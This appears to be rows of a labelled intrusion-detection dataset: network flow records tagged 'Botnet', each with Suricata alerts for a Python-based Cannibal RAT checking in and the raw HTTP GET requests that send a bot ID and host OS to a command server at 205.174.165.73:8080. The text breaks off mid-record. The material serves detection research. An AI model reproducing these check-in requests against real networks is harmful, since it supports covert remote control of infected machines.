192.168.10.14-51604-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4503748, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:00 | 64,090 | Friday | [{'timestamp': '2017-07-07T13:27:00.821622+0000', 'flow_id': 146297527243299, 'pcap_cnt': 4503748, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51604, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:00.758307+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGVlAAIAGo8jAqAoOza6lScmUH5Ag5OyWJyAQclARAQBC8wAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:00.821622+0000', 'flow_id': 146297527243299, 'pcap_cnt': 4503748, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51604, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:00.758307+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGVlAAIAGo8jAqAoOza6lScmUH5Ag5OyWJyAQclARAQBC8wAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,191 |
192.168.10.15-52264-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4504039, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:02 | 62,325 | Friday | [{'timestamp': '2017-07-07T13:27:02.396572+0000', 'flow_id': 1347518275656988, 'pcap_cnt': 4504039, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52264, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:02.335132+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobylAAIAGTffAqAoPza6lScwoH5A6fxCfodhEZFARAQBUEAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:02.396572+0000', 'flow_id': 1347518275656988, 'pcap_cnt': 4504039, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52264, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:02.335132+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobylAAIAGTffAqAoPza6lScwoH5A6fxCfodhEZFARAQBUEAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,198 |
192.168.10.9-2745-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4504572, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:08 | 101,255 | Friday | [{'timestamp': '2017-07-07T13:27:08.113291+0000', 'flow_id': 2185513640145304, 'pcap_cnt': 4504572, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2745, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:08.012696+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPRlAAIAGgA3AqAoJza6lSQq5H5A0yPgeoQ0kC1ARAQBU4QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:08.113291+0000', 'flow_id': 2185513640145304, 'pcap_cnt': 4504572, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2745, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:08.012696+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPRlAAIAGgA3AqAoJza6lSQq5H5A0yPgeoQ0kC1ARAQBU4QAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,206 |
192.168.10.14-51605-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4504777, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:10 | 65,224 | Friday | [{'timestamp': '2017-07-07T13:27:10.888176+0000', 'flow_id': 773873854222737, 'pcap_cnt': 4504777, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51605, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:10.823697+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGV5AAIAGo8PAqAoOza6lScmVH5AWDpVXRgVhz1ARAQA0xQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:10.888176+0000', 'flow_id': 773873854222737, 'pcap_cnt': 4504777, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51605, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:10.823697+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGV5AAIAGo8PAqAoOza6lScmVH5AWDpVXRgVhz1ARAQA0xQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,207 |
192.168.10.15-52265-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4504896, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:12 | 66,083 | Friday | [{'timestamp': '2017-07-07T13:27:12.463467+0000', 'flow_id': 1858675219108516, 'pcap_cnt': 4504896, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52265, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:12.397988+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoby5AAIAGTfLAqAoPza6lScwpH5D3vGm8DC8xjFARAQDmNQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:12.463467+0000', 'flow_id': 1858675219108516, 'pcap_cnt': 4504896, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52265, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:12.397988+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoby5AAIAGTfLAqAoPza6lScwpH5D3vGm8DC8xjFARAQDmNQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,208 |
192.168.10.9-2746-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4508544, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:18 | 92,489 | Friday | [{'timestamp': '2017-07-07T13:27:18.221462+0000', 'flow_id': 1618947324967426, 'pcap_cnt': 4508544, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2746, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 